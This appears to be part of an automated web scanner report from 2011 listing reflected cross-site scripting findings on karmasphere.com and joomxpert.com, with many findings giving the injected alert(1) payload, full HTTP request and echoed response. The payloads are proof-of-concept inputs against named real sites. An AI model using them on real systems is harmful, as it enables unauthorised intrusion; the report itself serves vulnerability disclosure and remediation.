<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" > ...[SNIP]... <9709c';alert(1)//fef8edcf38a=1&title=Big Data Intelligence from Karmasphere | News&x='+clickX+'&y='+clickY+'&solution='+solution+'&itemid='+itemid; hm_sendClickAjaxReq(url, data); } // true zurckgeben, damit das Eve ...[SNIP]...
The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 7600a'%3balert(1)//6de48c2196c was submitted in the REST URL parameter 4. This input was echoed as 7600a';alert(1)//6de48c2196c in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /components/com_rsform/controller/7600a'%3balert(1)//6de48c2196c HTTP/1.1
Host: karmasphere.com
Proxy-Connection: keep-alive
Referer: http://karmasphere.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=213720718.1296478383.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/14; __utma=213720718.1463850642.1296478383.1296478383.1296478383.1; __utmc=213720718; __utmb=213720718.1.10.1296478383; wp=BYBDDDDDDTTHTCX; _mkto_trk=id:294-XKZ-927&token:_mch-karmasphere.com-1296478390295-69233; 9a99d17bd50953aeb8a9e7667440422a=f89b9d074c6917940e1ca4ab49878bf2
Response
HTTP/1.1 404 NOT FOUND
Date: Tue, 01 Feb 2011 03:03:16 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8q DAV/2 mod_fcgid/2.3.5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Powered-By: PHP/5.2.15
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
X-Content-Encoded-By: Joomla! 1.5
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Last-Modified: Tue, 01 Feb 2011 03:03:17 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 34764
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" > ...[SNIP]... <= solution) { var url='http://karmasphere.com/components/com_stalytics2/trackHeat.php'; var data = 'url=http://karmasphere.com/components/com_rsform/controller/7600a';alert(1)//6de48c2196c&title=__404__&x='+clickX+'&y='+clickY+'&solution='+solution+'&itemid='+itemid; hm_sendClickAjaxReq(url, data); } // true zurckgeben, damit das Event weiterverarbeitet wird return tru ...[SNIP]...
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c8570'%3balert(1)//da627bcc128 was submitted in the REST URL parameter 1. This input was echoed as c8570';alert(1)//da627bcc128 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /kspec8570'%3balert(1)//da627bcc128/purchase.html HTTP/1.1
Host: karmasphere.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: 9a99d17bd50953aeb8a9e7667440422a=f89b9d074c6917940e1ca4ab49878bf2; __utmz=213720718.1296478383.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/14; wp=BYBDDDDDDTTHTCX; __utma=213720718.1463850642.1296478383.1296478383.1296478383.1; _mkto_trk=id:294-XKZ-927&token:_mch-karmasphere.com-1296478390295-69233; _jsuid=236660194602537908; __utmc=213720718; __utmb=213720718.6.10.1296478383;
Response
HTTP/1.1 404 NOT FOUND
Date: Tue, 01 Feb 2011 03:03:38 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8q DAV/2 mod_fcgid/2.3.5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Powered-By: PHP/5.2.15
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Last-Modified: Tue, 01 Feb 2011 03:03:39 GMT
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 34734
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" > ...[SNIP]... <= solution) { var url='http://karmasphere.com/components/com_stalytics2/trackHeat.php'; var data = 'url=http://karmasphere.com/kspec8570';alert(1)//da627bcc128/purchase.html&title=__404__&x='+clickX+'&y='+clickY+'&solution='+solution+'&itemid='+itemid; hm_sendClickAjaxReq(url, data); } // true zurckgeben, damit das Event weiterverarbeitet wird ...[SNIP]...
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d5e62'%3balert(1)//bc511ac55db was submitted in the REST URL parameter 2. This input was echoed as d5e62';alert(1)//bc511ac55db in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /kspe/d5e62'%3balert(1)//bc511ac55db HTTP/1.1
Host: karmasphere.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: 9a99d17bd50953aeb8a9e7667440422a=f89b9d074c6917940e1ca4ab49878bf2; __utmz=213720718.1296478383.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/14; wp=BYBDDDDDDTTHTCX; __utma=213720718.1463850642.1296478383.1296478383.1296478383.1; _mkto_trk=id:294-XKZ-927&token:_mch-karmasphere.com-1296478390295-69233; _jsuid=236660194602537908; __utmc=213720718; __utmb=213720718.6.10.1296478383;
Response
HTTP/1.1 404 NOT FOUND
Date: Tue, 01 Feb 2011 03:03:57 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8q DAV/2 mod_fcgid/2.3.5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Powered-By: PHP/5.2.15
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Last-Modified: Tue, 01 Feb 2011 03:03:57 GMT
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 34708
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" > ...[SNIP]... <= solution) { var url='http://karmasphere.com/components/com_stalytics2/trackHeat.php'; var data = 'url=http://karmasphere.com/kspe/d5e62';alert(1)//bc511ac55db&title=__404__&x='+clickX+'&y='+clickY+'&solution='+solution+'&itemid='+itemid; hm_sendClickAjaxReq(url, data); } // true zurckgeben, damit das Event weiterverarbeitet wird return tru ...[SNIP]...
3.67. http://karmasphere.com/kspe/purchase.html [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://karmasphere.com
Path: /kspe/purchase.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 8cb3f'%3balert(1)//4fc4fb23cdb was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 8cb3f';alert(1)//4fc4fb23cdb in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /kspe/purchase.html?8cb3f'%3balert(1)//4fc4fb23cdb=1 HTTP/1.1
Host: karmasphere.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: 9a99d17bd50953aeb8a9e7667440422a=f89b9d074c6917940e1ca4ab49878bf2; __utmz=213720718.1296478383.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/14; wp=BYBDDDDDDTTHTCX; __utma=213720718.1463850642.1296478383.1296478383.1296478383.1; _mkto_trk=id:294-XKZ-927&token:_mch-karmasphere.com-1296478390295-69233; _jsuid=236660194602537908; __utmc=213720718; __utmb=213720718.6.10.1296478383;
Response
HTTP/1.1 200 OK
Date: Tue, 01 Feb 2011 03:03:04 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8q DAV/2 mod_fcgid/2.3.5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Powered-By: PHP/5.2.15
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Last-Modified: Tue, 01 Feb 2011 03:03:05 GMT
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 30998

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
...[SNIP]...
<8cb3f';alert(1)//4fc4fb23cdb=1&title=Karmasphere Studio Professional Edition: Get It Now&x='+clickX+'&y='+clickY+'&solution='+solution+'&itemid='+itemid; hm_sendClickAjaxReq(url, data); } // true zurückgeben, damit d
...[SNIP]...
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 7bb48'%3balert(1)//0cda0bbc04 was submitted in the REST URL parameter 1. This input was echoed as 7bb48';alert(1)//0cda0bbc04 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /modules7bb48'%3balert(1)//0cda0bbc04/mod_sp_news_highlighter/assets/css/style.php HTTP/1.1
Host: karmasphere.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: 9a99d17bd50953aeb8a9e7667440422a=f89b9d074c6917940e1ca4ab49878bf2; __utmz=213720718.1296478383.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/14; wp=BYBDDDDDDTTHTCX; __utma=213720718.1463850642.1296478383.1296478383.1296478383.1; _mkto_trk=id:294-XKZ-927&token:_mch-karmasphere.com-1296478390295-69233; _jsuid=236660194602537908; __utmc=213720718; __utmb=213720718.6.10.1296478383;
Response
HTTP/1.1 404 NOT FOUND
Date: Tue, 01 Feb 2011 02:53:27 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8q DAV/2 mod_fcgid/2.3.5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Powered-By: PHP/5.2.15
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Last-Modified: Tue, 01 Feb 2011 02:53:27 GMT
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 34800

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
...[SNIP]...
<= solution) { var url='http://karmasphere.com/components/com_stalytics2/trackHeat.php'; var data = 'url=http://karmasphere.com/modules7bb48';alert(1)//0cda0bbc04/mod_sp_news_highlighter/assets/css/style.php&title=__404__&x='+clickX+'&y='+clickY+'&solution='+solution+'&itemid='+itemid; hm_sendClickAjaxReq(url, data); } // true zurückgeben, damit da
...[SNIP]...
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 33e32'%3balert(1)//e846e504266 was submitted in the REST URL parameter 2. This input was echoed as 33e32';alert(1)//e846e504266 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /modules/mod_sp_news_highlighter33e32'%3balert(1)//e846e504266/assets/css/style.php HTTP/1.1
Host: karmasphere.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: 9a99d17bd50953aeb8a9e7667440422a=f89b9d074c6917940e1ca4ab49878bf2; __utmz=213720718.1296478383.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/14; wp=BYBDDDDDDTTHTCX; __utma=213720718.1463850642.1296478383.1296478383.1296478383.1; _mkto_trk=id:294-XKZ-927&token:_mch-karmasphere.com-1296478390295-69233; _jsuid=236660194602537908; __utmc=213720718; __utmb=213720718.6.10.1296478383;
Response
HTTP/1.1 404 NOT FOUND
Date: Tue, 01 Feb 2011 02:57:15 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8q DAV/2 mod_fcgid/2.3.5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Powered-By: PHP/5.2.15
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Last-Modified: Tue, 01 Feb 2011 02:57:16 GMT
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 34802

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
...[SNIP]...
<= solution) { var url='http://karmasphere.com/components/com_stalytics2/trackHeat.php'; var data = 'url=http://karmasphere.com/modules/mod_sp_news_highlighter33e32';alert(1)//e846e504266/assets/css/style.php&title=__404__&x='+clickX+'&y='+clickY+'&solution='+solution+'&itemid='+itemid; hm_sendClickAjaxReq(url, data); } // true zurückgeben, damit das Event weiterverarbeite
...[SNIP]...
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 1c043'%3balert(1)//d81ca0526a0 was submitted in the REST URL parameter 3. This input was echoed as 1c043';alert(1)//d81ca0526a0 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /modules/mod_sp_news_highlighter/assets1c043'%3balert(1)//d81ca0526a0/css/style.php HTTP/1.1
Host: karmasphere.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: 9a99d17bd50953aeb8a9e7667440422a=f89b9d074c6917940e1ca4ab49878bf2; __utmz=213720718.1296478383.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/14; wp=BYBDDDDDDTTHTCX; __utma=213720718.1463850642.1296478383.1296478383.1296478383.1; _mkto_trk=id:294-XKZ-927&token:_mch-karmasphere.com-1296478390295-69233; _jsuid=236660194602537908; __utmc=213720718; __utmb=213720718.6.10.1296478383;
Response
HTTP/1.1 404 NOT FOUND
Date: Tue, 01 Feb 2011 02:57:58 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8q DAV/2 mod_fcgid/2.3.5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Powered-By: PHP/5.2.15
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Last-Modified: Tue, 01 Feb 2011 02:57:59 GMT
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 34802

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
...[SNIP]...
<= solution) { var url='http://karmasphere.com/components/com_stalytics2/trackHeat.php'; var data = 'url=http://karmasphere.com/modules/mod_sp_news_highlighter/assets1c043';alert(1)//d81ca0526a0/css/style.php&title=__404__&x='+clickX+'&y='+clickY+'&solution='+solution+'&itemid='+itemid; hm_sendClickAjaxReq(url, data); } // true zurückgeben, damit das Event weiterverarbeitet wird
...[SNIP]...
The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 70757'%3balert(1)//86fa2cf4d79 was submitted in the REST URL parameter 4. This input was echoed as 70757';alert(1)//86fa2cf4d79 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /modules/mod_sp_news_highlighter/assets/css70757'%3balert(1)//86fa2cf4d79/style.php HTTP/1.1
Host: karmasphere.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: 9a99d17bd50953aeb8a9e7667440422a=f89b9d074c6917940e1ca4ab49878bf2; __utmz=213720718.1296478383.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/14; wp=BYBDDDDDDTTHTCX; __utma=213720718.1463850642.1296478383.1296478383.1296478383.1; _mkto_trk=id:294-XKZ-927&token:_mch-karmasphere.com-1296478390295-69233; _jsuid=236660194602537908; __utmc=213720718; __utmb=213720718.6.10.1296478383;
Response
HTTP/1.1 404 NOT FOUND
Date: Tue, 01 Feb 2011 02:59:23 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8q DAV/2 mod_fcgid/2.3.5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Powered-By: PHP/5.2.15
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Last-Modified: Tue, 01 Feb 2011 02:59:24 GMT
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 34802

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
...[SNIP]...
<= solution) { var url='http://karmasphere.com/components/com_stalytics2/trackHeat.php'; var data = 'url=http://karmasphere.com/modules/mod_sp_news_highlighter/assets/css70757';alert(1)//86fa2cf4d79/style.php&title=__404__&x='+clickX+'&y='+clickY+'&solution='+solution+'&itemid='+itemid; hm_sendClickAjaxReq(url, data); } // true zurückgeben, damit das Event weiterverarbeitet wird
The value of REST URL parameter 5 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 1c935'%3balert(1)//582250f6d9 was submitted in the REST URL parameter 5. This input was echoed as 1c935';alert(1)//582250f6d9 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /modules/mod_sp_news_highlighter/assets/css/1c935'%3balert(1)//582250f6d9 HTTP/1.1
Host: karmasphere.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: 9a99d17bd50953aeb8a9e7667440422a=f89b9d074c6917940e1ca4ab49878bf2; __utmz=213720718.1296478383.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/14; wp=BYBDDDDDDTTHTCX; __utma=213720718.1463850642.1296478383.1296478383.1296478383.1; _mkto_trk=id:294-XKZ-927&token:_mch-karmasphere.com-1296478390295-69233; _jsuid=236660194602537908; __utmc=213720718; __utmb=213720718.6.10.1296478383;
Response
HTTP/1.1 404 NOT FOUND
Date: Tue, 01 Feb 2011 03:00:46 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8q DAV/2 mod_fcgid/2.3.5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Powered-By: PHP/5.2.15
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Last-Modified: Tue, 01 Feb 2011 03:00:47 GMT
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 34782

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
...[SNIP]...
<= solution) { var url='http://karmasphere.com/components/com_stalytics2/trackHeat.php'; var data = 'url=http://karmasphere.com/modules/mod_sp_news_highlighter/assets/css/1c935';alert(1)//582250f6d9&title=__404__&x='+clickX+'&y='+clickY+'&solution='+solution+'&itemid='+itemid; hm_sendClickAjaxReq(url, data); } // true zurückgeben, damit das Event weiterverarbeitet wird return tru
...[SNIP]...
3.73. http://www.joomxpert.com/ [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Firm
Host: http://www.joomxpert.com
Path: /
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f9557"><a>a3ee55004ad was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /?f9557"><a>a3ee55004ad=1 HTTP/1.1
Host: www.joomxpert.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Date: Tue, 01 Feb 2011 02:50:46 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.6
Set-Cookie: 7b455f4d3ab614277ad9c7fb1aeeb2a3=8clqnfh50qc4ltt79flouvpne1; path=/
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Tue, 01 Feb 2011 02:50:47 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 31516
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload fd9f9'%3balert(1)//50f1acaf291 was submitted in the REST URL parameter 1. This input was echoed as fd9f9';alert(1)//50f1acaf291 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /Downloadfd9f9'%3balert(1)//50f1acaf291/register-for-community-edition.html HTTP/1.1
Host: www.karmasphere.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 404 NOT FOUND
Date: Mon, 31 Jan 2011 03:04:57 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8q DAV/2 mod_fcgid/2.3.5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Powered-By: PHP/5.2.15
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 9a99d17bd50953aeb8a9e7667440422a=966766fe8960157e672b68b7924393ca; path=/
Last-Modified: Mon, 31 Jan 2011 03:04:58 GMT
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 35071

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
...[SNIP]...
<= solution) { var url='http://www.karmasphere.com/components/com_stalytics2/trackHeat.php'; var data = 'url=http://www.karmasphere.com/Downloadfd9f9';alert(1)//50f1acaf291/register-for-community-edition.html&title=__404__&x='+clickX+'&y='+clickY+'&solution='+solution+'&itemid='+itemid; hm_sendClickAjaxReq(url, data); } // true zurückgeben, damit das Event w
...[SNIP]...
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 2d1f0'%3balert(1)//b0c89b924 was submitted in the REST URL parameter 2. This input was echoed as 2d1f0';alert(1)//b0c89b924 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /Download/2d1f0'%3balert(1)//b0c89b924 HTTP/1.1
Host: www.karmasphere.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 404 NOT FOUND
Date: Mon, 31 Jan 2011 03:05:06 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8q DAV/2 mod_fcgid/2.3.5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Powered-By: PHP/5.2.15
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 9a99d17bd50953aeb8a9e7667440422a=6861308c512adb0c7b9b3a1552b92e22; path=/
Last-Modified: Mon, 31 Jan 2011 03:05:07 GMT
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 34997

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
...[SNIP]...
<= solution) { var url='http://www.karmasphere.com/components/com_stalytics2/trackHeat.php'; var data = 'url=http://www.karmasphere.com/Download/2d1f0';alert(1)//b0c89b924&title=__404__&x='+clickX+'&y='+clickY+'&solution='+solution+'&itemid='+itemid; hm_sendClickAjaxReq(url, data); } // true zurückgeben, damit das Event weiterverarbeitet wird return tru
...[SNIP]...
The value of the _kk request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a973d'%3balert(1)//32229679544 was submitted in the _kk parameter. This input was echoed as a973d';alert(1)//32229679544 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /Download/register-for-community-edition.html?_kk=hadoop%20clouda973d'%3balert(1)//32229679544&_kt=6fcff4e0-0357-43fd-bfb8-eddd5786f223 HTTP/1.1
Host: www.karmasphere.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
